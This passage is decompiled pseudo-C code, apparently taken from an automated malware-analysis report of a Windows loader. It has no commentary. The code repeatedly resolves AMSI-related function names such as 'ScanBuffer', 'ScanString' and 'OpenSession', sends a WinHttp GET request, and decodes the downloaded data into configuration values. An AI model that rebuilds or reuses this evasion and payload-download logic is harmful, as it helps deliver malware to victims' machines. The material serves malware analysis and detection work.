						_pop(_t6935); // executed
						E03277C04(_v860,  *0x33928a8, _t6935, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v868, E03264964(_v872));
						_push(_v868);
						E032647B0( &_v880,  *0x33928a8, 0x3286aa0);
						E03264698( &_v876, E03264964(_v880));
						_pop(_t6940); // executed
						E03277C04(_v876,  *0x33928a8, _t6940, __eflags); // executed
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v884, E03264964(_v888));
						_push(_v884);
						E032647B0( &_v896,  *0x33928a8, 0x3286aa0);
						E03264698( &_v892, E03264964(_v896));
						_pop(_t6945); // executed
						E03277C04(_v892,  *0x33928a8, _t6945, __eflags); // executed
						_t5093 = E0327D464( *0x33928ac, 0x3286cd8);
						__eflags = _t5093;
						if(_t5093 != 0) {
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v900, E03264964(_v904));
							_push(_v900);
							E032647B0( &_v912,  *0x33928a8, 0x3286aa0);
							E03264698( &_v908, E03264964(_v912));
							_pop(_t6951); // executed
							E03277C04(_v908,  *0x33928a8, _t6951, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v916, E03264964(_v920));
							_push(_v916);
							E032647B0( &_v928,  *0x33928a8, 0x3286aa0);
							E03264698( &_v924, E03264964(_v928));
							_pop(_t6956); // executed
							E03277C04(_v924,  *0x33928a8, _t6956, __eflags); // executed
							_push(0);
							L0326CD94();
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v932, E03264964(_v936));
							_push(_v932);
							E032647B0( &_v944,  *0x33928a8, 0x3286aa0);
							E03264698( &_v940, E03264964(_v944));
							_pop(_t6961); // executed
							E03277C04(_v940,  *0x33928a8, _t6961, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("UacScan");
							E03264824();
							E03264698( &_v948, E03264964(_v952));
							_push(_v948);
							E032647B0( &_v960,  *0x33928a8, 0x3286aa0);
							E03264698( &_v956, E03264964(_v960));
							_pop(_t6966); // executed
							E03277C04(_v956,  *0x33928a8, _t6966, __eflags); // executed
							E03276DC0("WinHttp.WinHttpRequest.5.1", 0x3392880,  &_v964, _t7104, _t7105, __eflags); // executed
							E0327287C(0x3392804, _v964);
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v968, E03264964(_v972));
							_push(_v968);
							E032647B0( &_v980,  *0x33928a8, 0x3286aa0);
							E03264698( &_v976, E03264964(_v980));
							_pop(_t6973); // executed
							E03277C04(_v976,  *0x33928a8, _t6973, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanString");
							E03264824();
							E03264698( &_v984, E03264964(_v988));
							_push(_v984);
							E032647B0( &_v996,  *0x33928a8, 0x3286aa0);
							E03264698( &_v992, E03264964(_v996));
							_pop(_t6978); // executed
							E03277C04(_v992,  *0x33928a8, _t6978, __eflags); // executed
							_push(0);
							_push(0x33928ac);
							E0326E3E0(0, 0x3392804, 0x3286d10, "GET"); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v1000, E03264964(_v1004));
							_push(_v1000);
							E032647B0( &_v1012,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1008, E03264964(_v1012));
							_pop(_t6983); // executed
							E03277C04(_v1008,  *0x33928a8, _t6983, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v1016, E03264964(_v1020));
							_push(_v1016);
							E032647B0( &_v1028,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1024, E03264964(_v1028));
							_pop(_t6988); // executed
							E03277C04(_v1024,  *0x33928a8, _t6988, __eflags); // executed
							_push(0x3286d1c);
							_push(0x3392804);
							_push(0); // executed
							E0326E3E0(); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("OpenSession");
							E03264824();
							E03264698( &_v1032, E03264964(_v1036));
							_push(_v1032);
							E032647B0( &_v1044,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1040, E03264964(_v1044));
							_pop(_t6993); // executed
							E03277C04(_v1040,  *0x33928a8, _t6993, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanString");
							E03264824();
							E03264698( &_v1048, E03264964(_v1052));
							_push(_v1048);
							E032647B0( &_v1060,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1056, E03264964(_v1060));
							_pop(_t6998); // executed
							E03277C04(_v1056,  *0x33928a8, _t6998, __eflags); // executed
							_push(0x3286d28);
							_push(0x3392804);
							_push( &_v1076);
							E0326E3E0();
							_t7108 = _t7108 + 0x30;
							E032717CC(0x3392834, 0x3392880,  &_v1076, _t7104, _t7105, _t7125);
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("Initialize");
							E03264824();
							E03264698( &_v1080, E03264964(_v1084));
							_push(_v1080);
							E032647B0( &_v1092,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1088, E03264964(_v1092));
							_pop(_t7004); // executed
							E03277C04(_v1088,  *0x33928a8, _t7004, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("ScanString");
							E03264824();
							E03264698( &_v1096, E03264964(_v1100));
							_push(_v1096);
							E032647B0( &_v1108,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1104, E03264964(_v1108));
							_pop(_t7009); // executed
							E03277C04(_v1104,  *0x33928a8, _t7009, __eflags); // executed
							_v1112 =  *0x3392834;
							_t5273 = _v1112;
							__eflags = _t5273;
							if(_t5273 != 0) {
								_t5334 = _t5273 - 4;
								__eflags = _t5334;
								_t5273 =  *_t5334;
							}
							__eflags = _t5273 - 0x7530;
							if(_t5273 > 0x7530) {
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("OpenSession");
								E03264824();
								E03264698( &_v1116, E03264964(_v1120));
								_push(_v1116);
								E032647B0( &_v1128,  *0x33928a8, 0x3286aa0);
								E03264698( &_v1124, E03264964(_v1128));
								_pop(_t7024);
								E03277C04(_v1124,  *0x33928a8, _t7024, __eflags);
								_push(0x3286aa0);
								_push( *0x33928a8);
								_push("ScanBuffer");
								E03264824();
								E03264698( &_v1132, E03264964(_v1136));
								_push(_v1132);
								E032647B0( &_v1144,  *0x33928a8, 0x3286aa0);
								E03264698( &_v1140, E03264964(_v1144));
								_pop(_t7029);
								E03277C04(_v1140,  *0x33928a8, _t7029, __eflags);
								E0327D858( *0x3392834,  *0x33928a8,  &_v1148);
								E032644F4(0x3392874, _v1148);
							}
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("Initialize");
							E03264824();
							E03264698( &_v1152, E03264964(_v1156));
							_push(_v1152);
							E032647B0( &_v1164,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1160, E03264964(_v1164));
							_pop(_t7014); // executed
							E03277C04(_v1160,  *0x33928a8, _t7014, __eflags); // executed
							_push(0x3286aa0);
							_push( *0x33928a8);
							_push("UacScan");
							E03264824();
							E03264698( &_v1168, E03264964(_v1172));
							_push(_v1168);
							E032647B0( &_v1180,  *0x33928a8, 0x3286aa0);
							E03264698( &_v1176, E03264964(_v1180));
							_pop(_t7019); // executed
							E03277C04(_v1176,  *0x33928a8, _t7019, __eflags); // executed
							L0326CD9C();
						}
					}
				} else {
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v388, E03264964(_v392));
					_push(_v388);
					E032647B0( &_v400,  *0x33928a8, 0x3286aa0);
					E03264698( &_v396, E03264964(_v400));
					_pop(_t7036);
					E03277C04(_v396,  *0x33928a8, _t7036, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v404, E03264964(_v408));
					_push(_v404);
					E032647B0( &_v416,  *0x33928a8, 0x3286aa0);
					E03264698( &_v412, E03264964(_v416));
					_pop(_t7041);
					E03277C04(_v412,  *0x33928a8, _t7041, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v420, E03264964(_v424));
					_push(_v420);
					E032647B0( &_v432,  *0x33928a8, 0x3286aa0);
					E03264698( &_v428, E03264964(_v432));
					_pop(_t7046);
					E03277C04(_v428,  *0x33928a8, _t7046, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v436, E03264964(_v440));
					_push(_v436);
					E032647B0( &_v448,  *0x33928a8, 0x3286aa0);
					E03264698( &_v444, E03264964(_v448));
					_pop(_t7051);
					E03277C04(_v444,  *0x33928a8, _t7051, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v452, E03264964(_v456));
					_push(_v452);
					E032647B0( &_v464,  *0x33928a8, 0x3286aa0);
					E03264698( &_v460, E03264964(_v464));
					_pop(_t7056);
					E03277C04(_v460,  *0x33928a8, _t7056, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v468, E03264964(_v472));
					_push(_v468);
					E032647B0( &_v480,  *0x33928a8, 0x3286aa0);
					E03264698( &_v476, E03264964(_v480));
					_pop(_t7061);
					E03277C04(_v476,  *0x33928a8, _t7061, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v484, E03264964(_v488));
					_push(_v484);
					E032647B0( &_v496,  *0x33928a8, 0x3286aa0);
					E03264698( &_v492, E03264964(_v496));
					_pop(_t7066);
					E03277C04(_v492,  *0x33928a8, _t7066, _t7114);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v500, E03264964(_v504));
					_push(_v500);
					E032647B0( &_v512,  *0x33928a8, 0x3286aa0);
					E03264698( &_v508, E03264964(_v512));
					_pop(_t7071);
					E03277C04(_v508,  *0x33928a8, _t7071, _t7114);
					_t5448 = E0327CCD4( *0x3392838, 0x3392880, _t7071, _t7104, _t7105, _t7114, _t7125);
					_t7115 = _t5448 - 1;
					if(_t5448 == 1) {
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v516, E03264964(_v520));
						_push(_v516);
						E032647B0( &_v528,  *0x33928a8, 0x3286aa0);
						E03264698( &_v524, E03264964(_v528));
						_pop(_t7076);
						E03277C04(_v524,  *0x33928a8, _t7076, _t7115);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v532, E03264964(_v536));
						_push(_v532);
						E032647B0( &_v544,  *0x33928a8, 0x3286aa0);
						E03264698( &_v540, E03264964(_v544));
						_pop(_t7081);
						E03277C04(_v540,  *0x33928a8, _t7081, _t7115);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v548, E03264964(_v552));
						_push(_v548);
						E032647B0( &_v560,  *0x33928a8, 0x3286aa0);
						E03264698( &_v556, E03264964(_v560));
						_pop(_t7086);
						E03277C04(_v556,  *0x33928a8, _t7086, _t7115);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v564, E03264964(_v568));
						_push(_v564);
						E032647B0( &_v576,  *0x33928a8, 0x3286aa0);
						E03264698( &_v572, E03264964(_v576));
						_pop(_t7091);
						E03277C04(_v572,  *0x33928a8, _t7091, _t7115);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v580, E03264964(_v584));
						_push(_v580);
						E032647B0( &_v592,  *0x33928a8, 0x3286aa0);
						E03264698( &_v588, E03264964(_v592));
						_pop(_t7096);
						E03277C04(_v588,  *0x33928a8, _t7096, _t7115);
					}
				}
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("OpenSession");
				E03264824();
				E03264698( &_v1184, E03264964(_v1188));
				_push(_v1184);
				E032647B0( &_v1196,  *0x33928a8, 0x3286aa0);
				E03264698( &_v1192, E03264964(_v1196));
				_pop(_t5976); // executed
				E03277C04(_v1192,  *0x33928a8, _t5976, _t7115); // executed
				_push(0x3286aa0);
				_push( *0x33928a8);
				_push("ScanString");
				E03264824();
				E03264698( &_v1200, E03264964(_v1204));
				_push(_v1200);
				E032647B0( &_v1212,  *0x33928a8, 0x3286aa0);
				E03264698( &_v1208, E03264964(_v1212));
				_pop(_t5981); // executed
				E03277C04(_v1208,  *0x33928a8, _t5981, _t7115); // executed
				_v1112 =  *0x3392874;
				_t2477 = _v1112;
				if(_t2477 != 0) {
					_t2477 =  *((intOrPtr*)(_t2477 - 4));
				}
				_t7118 = _t2477 - 0x493e0;
				if(_t2477 <= 0x493e0) {
					L49:
					__eflags = 0;
					_pop(_t5982);
					 *[fs:eax] = _t5982;
					_push(0x3286a75);
					E032644C4( &_v4824, 0x64);
					E032644C4( &_v4424, 0x18);
					E03264C24( &_v4328);
					E032644A0( &_v4324);
					E03264C24( &_v4320);
					E032644C4( &_v4316, 0x47);
					E032644C4( &_v4024, 2);
					E032644C4( &_v4032, 2);
					E032644C4( &_v4016, 0xd);
					E03264C24( &_v3964);
					E032644C4( &_v3960, 0x54);
					E032644C4( &_v3624, 0x26);
					E03264C3C( &_v3472, 3);
					E032644C4( &_v3460, 8);
					E03264C3C( &_v3428, 6);
					E032644C4( &_v3404, 0x10);
					E032644C4( &_v3084, 0x1d);
					E032644C4( &_v2968, 4);
					E03264C24( &_v2952);
					E032644A0( &_v2948);
					E03264C24( &_v2944);
					E032644C4( &_v2940, 0x26);
					E03264C24( &_v2788);
					E032644A0( &_v2784);
					E03264C24( &_v2780);
					E032644C4( &_v2776, 0x19);
					E03264C24( &_v2676);
					E032644A0( &_v2672);
					E03264C24( &_v2668);
					E032644C4( &_v2664, 0x16);
					E032644C4( &_v2568, 2);
					E032644C4( &_v2576, 2);
					E03264C24( &_v2560);
					E032644A0( &_v2556);
					E03264C24( &_v2552);
					E032644C4( &_v2548, 0x5e);
					E032644A0( &_v2160);
					E032644C4( &_v2172, 3);
					E032644C4( &_v2156, 0x43);
					E03264C24( &_v1888);
					E032644A0( &_v1884);
					E03264C24( &_v1880);
					E032644C4( &_v1876, 0x19);
					E032644C4( &_v1768, 2);
					E032644C4( &_v1776, 2);
					E032644C4( &_v1760, 0x56);
					_t6009 =  *0x327ca10; // 0x327ca14
					E032657A0( &_v1416, _t6009);
					E032644C4( &_v1412, 8);
					E032644C4( &_v1376, 3);
					E032644A0( &_v1380);
					E032644C4( &_v1364, 0x3f);
					E032644C4( &_v1108, 8);
					E0326E3D8( &_v1076);
					E032644C4( &_v1060, 0x18);
					E03265E70( &_v964);
					E032644C4( &_v952, 2);
					E032644C4( &_v960, 2);
					E032644C4( &_v944, 0x41);
					_t6018 =  *0x327ca10; // 0x327ca14
					E032657A0( &_v684, _t6018);
					E032644C4( &_v680, 8);
					E03264C24( &_v648);
					E032644C4( &_v644, 0x15);
					E032644C4( &_v552, 2);
					E032644C4( &_v560, 2);
					E032644C4( &_v544, 0x5f);
					E032644C4( &_v160, 3);
					E032644A0( &_v164);
					return E032644C4( &_v148, 0x24);
				} else {
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1216, E03264964(_v1220));
					_push(_v1216);
					E032647B0( &_v1228,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1224, E03264964(_v1228));
					_pop(_t6030);
					E03277C04(_v1224,  *0x33928a8, _t6030, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v1232, E03264964(_v1236));
					_push(_v1232);
					E032647B0( &_v1244,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1240, E03264964(_v1244));
					_pop(_t6035);
					E03277C04(_v1240,  *0x33928a8, _t6035, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1248, E03264964(_v1252));
					_push(_v1248);
					E032647B0( &_v1260,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1256, E03264964(_v1260));
					_pop(_t6040);
					E03277C04(_v1256,  *0x33928a8, _t6040, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1264, E03264964(_v1268));
					_push(_v1264);
					E032647B0( &_v1276,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1272, E03264964(_v1276));
					_pop(_t6045);
					E03277C04(_v1272,  *0x33928a8, _t6045, _t7118);
					E0327D550( *0x3392874, 0x3392880,  &_v1280, E03267AB0( *0x3392838, _t7118), _t7105);
					E032644F4(0x3392800, _v1280);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v1284, E03264964(_v1288));
					_push(_v1284);
					E032647B0( &_v1296,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1292, E03264964(_v1296));
					_pop(_t6052);
					E03277C04(_v1292,  *0x33928a8, _t6052, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v1300, E03264964(_v1304));
					_push(_v1300);
					E032647B0( &_v1312,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1308, E03264964(_v1312));
					_pop(_t6057);
					E03277C04(_v1308,  *0x33928a8, _t6057, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1316, E03264964(_v1320));
					_push(_v1316);
					E032647B0( &_v1328,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1324, E03264964(_v1328));
					_pop(_t6062);
					E03277C04(_v1324,  *0x33928a8, _t6062, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1332, E03264964(_v1336));
					_push(_v1332);
					E032647B0( &_v1344,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1340, E03264964(_v1344));
					_pop(_t6067);
					E03277C04(_v1340,  *0x33928a8, _t6067, _t7118);
					E0327D4EC( *0x3392800,  *0x33928a8,  &_v1348);
					E032644F4(0x3392830, _v1348);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v1352, E03264964(_v1356));
					_push(_v1352);
					E032647B0( &_v1364,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1360, E03264964(_v1364));
					_pop(_t6074);
					E03277C04(_v1360,  *0x33928a8, _t6074, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v1368, E03264964(_v1372));
					_push(_v1368);
					E032647B0( &_v1380,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1376, E03264964(_v1380));
					_pop(_t6079);
					E03277C04(_v1376,  *0x33928a8, _t6079, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1384, E03264964(_v1388));
					_push(_v1384);
					E032647B0( &_v1396,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1392, E03264964(_v1396));
					_pop(_t6084);
					E03277C04(_v1392,  *0x33928a8, _t6084, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1400, E03264964(_v1404));
					_push(_v1400);
					E032647B0( &_v1412,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1408, E03264964(_v1412));
					_pop(_t6089);
					E03277C04(_v1408,  *0x33928a8, _t6089, _t7118);
					_t6090 =  *0x3289ae4; // 0x5b7194
					E03264728( &_v1420, _t6090);
					E0327CD4C( *0x3392830, 0x3392880,  &_v1416, _v1420, _t7104, _t7105);
					_t5590 =  *0x327ca10; // 0x327ca14
					E032657DC(0x3392880, _t5590, _v1416);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("Initialize");
					E03264824();
					E03264698( &_v1424, E03264964(_v1428));
					_push(_v1424);
					E032647B0( &_v1436,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1432, E03264964(_v1436));
					_pop(_t6097);
					E03277C04(_v1432,  *0x33928a8, _t6097, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v1440, E03264964(_v1444));
					_push(_v1440);
					E032647B0( &_v1452,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1448, E03264964(_v1452));
					_pop(_t6102);
					E03277C04(_v1448,  *0x33928a8, _t6102, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1456, E03264964(_v1460));
					_push(_v1456);
					E032647B0( &_v1468,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1464, E03264964(_v1468));
					_pop(_t6107);
					E03277C04(_v1464,  *0x33928a8, _t6107, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1472, E03264964(_v1476));
					_push(_v1472);
					E032647B0( &_v1484,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1480, E03264964(_v1484));
					_pop(_t6112);
					E03277C04(_v1480,  *0x33928a8, _t6112, _t7118);
					E032644F4(0x33928d4,  *((intOrPtr*)( *0x3392880 + 4)));
					E032644F4(0x33928cc,  *((intOrPtr*)( *0x3392880 + 8)));
					E032644F4(0x339286c,  *((intOrPtr*)( *0x3392880 + 0xc)));
					E032644F4(0x33928d0,  *((intOrPtr*)( *0x3392880 + 0x10)));
					E032644F4(0x33928b8,  *((intOrPtr*)( *0x3392880 + 0x14)));
					E032644F4(0x33928bc,  *((intOrPtr*)( *0x3392880 + 0x18)));
					E032644F4(0x33928c0,  *((intOrPtr*)( *0x3392880 + 0x1c)));
					E032644F4(0x33928c4,  *((intOrPtr*)( *0x3392880 + 0x20)));
					E032644F4(0x33928b0,  *((intOrPtr*)( *0x3392880 + 0x24)));
					E032644F4(0x3392824,  *((intOrPtr*)( *0x3392880 + 0x28)));
					E032644F4(0x3392828,  *((intOrPtr*)( *0x3392880 + 0x2c)));
					E032644F4(0x339282c,  *((intOrPtr*)( *0x3392880 + 0x30)));
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1488, E03264964(_v1492));
					_push(_v1488);
					E032647B0( &_v1500,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1496, E03264964(_v1500));
					_pop(_t6141);
					E03277C04(_v1496,  *0x33928a8, _t6141, _t7118);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v1504, E03264964(_v1508));
					_push(_v1504);
					E032647B0( &_v1516,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1512, E03264964(_v1516));
					_pop(_t6146);
					E03277C04(_v1512,  *0x33928a8, _t6146, _t7118);
					E03264698( &_v1520, E03264964( *0x339287c));
					_t2912 = E03267E64(_v1520);
					_t7119 = _t2912;
					if(_t2912 == 0) {
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v1524, E03264964(_v1528));
						_push(_v1524);
						E032647B0( &_v1536,  *0x33928a8, 0x3286aa0);
						E03264698( &_v1532, E03264964(_v1536));
						_pop(_t6897);
						E03277C04(_v1532,  *0x33928a8, _t6897, _t7119);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v1540, E03264964(_v1544));
						_push(_v1540);
						E032647B0( &_v1552,  *0x33928a8, 0x3286aa0);
						E03264698( &_v1548, E03264964(_v1552));
						_pop(_t6902);
						E03277C04(_v1548,  *0x33928a8, _t6902, _t7119);
						E03264698( &_v1556, E03264964( *0x339287c));
						E0326802C(_v1556);
					}
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1560, E03264964(_v1564));
					_push(_v1560);
					E032647B0( &_v1572,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1568, E03264964(_v1572));
					_pop(_t6152);
					E03277C04(_v1568,  *0x33928a8, _t6152, _t7119);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1576, E03264964(_v1580));
					_push(_v1576);
					E032647B0( &_v1588,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1584, E03264964(_v1588));
					_pop(_t6157);
					E03277C04(_v1584,  *0x33928a8, _t6157, _t7119);
					_v1112 =  *0x33928cc;
					_t5539 = _v1112;
					if(_t5539 != 0) {
						_t5539 =  *(_t5539 - 4);
					}
					_t7122 = _t5539 - 3;
					E032649C4( *0x33928cc, _t5539 - 3, 1, 0x33928cc);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1592, E03264964(_v1596));
					_push(_v1592);
					E032647B0( &_v1604,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1600, E03264964(_v1604));
					_pop(_t6163);
					E03277C04(_v1600,  *0x33928a8, _t6163, _t7122);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanString");
					E03264824();
					E03264698( &_v1608, E03264964(_v1612));
					_push(_v1608);
					E032647B0( &_v1620,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1616, E03264964(_v1620));
					_pop(_t6168);
					E03277C04(_v1616,  *0x33928a8, _t6168, _t7122);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("OpenSession");
					E03264824();
					E03264698( &_v1624, E03264964(_v1628));
					_push(_v1624);
					E032647B0( &_v1636,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1632, E03264964(_v1636));
					_pop(_t6173);
					E03277C04(_v1632,  *0x33928a8, _t6173, _t7122);
					_push(0x3286aa0);
					_push( *0x33928a8);
					_push("ScanBuffer");
					E03264824();
					E03264698( &_v1640, E03264964(_v1644));
					_push(_v1640);
					E032647B0( &_v1652,  *0x33928a8, 0x3286aa0);
					E03264698( &_v1648, E03264964(_v1652));
					_pop(_t6178);
					E03277C04(_v1648,  *0x33928a8, _t6178, _t7122);
					E032648B0( *0x33928b8, 0x3286d40);
					if(_t7122 != 0) {
						L28:
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v2204, E03264964(_v2208));
						_push(_v2204);
						E032647B0( &_v2216,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2212, E03264964(_v2216));
						_pop(_t6184);
						E03277C04(_v2212,  *0x33928a8, _t6184, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v2220, E03264964(_v2224));
						_push(_v2220);
						E032647B0( &_v2232,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2228, E03264964(_v2232));
						_pop(_t6189);
						E03277C04(_v2228,  *0x33928a8, _t6189, __eflags);
						E0327CE98( *0x339286c, _t5539,  &_v2236,  *0x33928d4, _t7104, _t7105);
						E032644F4(0x339281c, _v2236);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v2240, E03264964(_v2244));
						_push(_v2240);
						E032647B0( &_v2252,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2248, E03264964(_v2252));
						_pop(_t6196);
						E03277C04(_v2248,  *0x33928a8, _t6196, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v2256, E03264964(_v2260));
						_push(_v2256);
						E032647B0( &_v2268,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2264, E03264964(_v2268));
						_pop(_t6201);
						E03277C04(_v2264,  *0x33928a8, _t6201, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v2272, E03264964(_v2276));
						_push(_v2272);
						E032647B0( &_v2284,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2280, E03264964(_v2284));
						_pop(_t6206);
						E03277C04(_v2280,  *0x33928a8, _t6206, __eflags);
						E0327D550( *0x339281c, _t5539,  &_v2288, E03267AB0( *0x33928c4, __eflags), _t7105);
						E032644F4(0x3392818, _v2288);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("Initialize");
						E03264824();
						E03264698( &_v2292, E03264964(_v2296));
						_push(_v2292);
						E032647B0( &_v2304,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2300, E03264964(_v2304));
						_pop(_t6213);
						E03277C04(_v2300,  *0x33928a8, _t6213, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("OpenSession");
						E03264824();
						E03264698( &_v2308, E03264964(_v2312));
						_push(_v2308);
						E032647B0( &_v2320,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2316, E03264964(_v2320));
						_pop(_t6218);
						E03277C04(_v2316,  *0x33928a8, _t6218, __eflags);
						_push(0x3286aa0);
						_push( *0x33928a8);
						_push("ScanBuffer");
						E03264824();
						E03264698( &_v2324, E03264964(_v2328));
						_push(_v2324);
						E032647B0( &_v2336,  *0x33928a8, 0x3286aa0);
						E03264698( &_v2332, E03264964(_v2336));
						_pop(_t6223);
						E03277C04(_v2332,  *0x33928a8, _t6223, __eflags);
						E03277CB0( *0x3392818,  *0x33928a8,  &_v2344);
						E0327D4EC(_v2344,  *0x33928a8,  &_v2340);
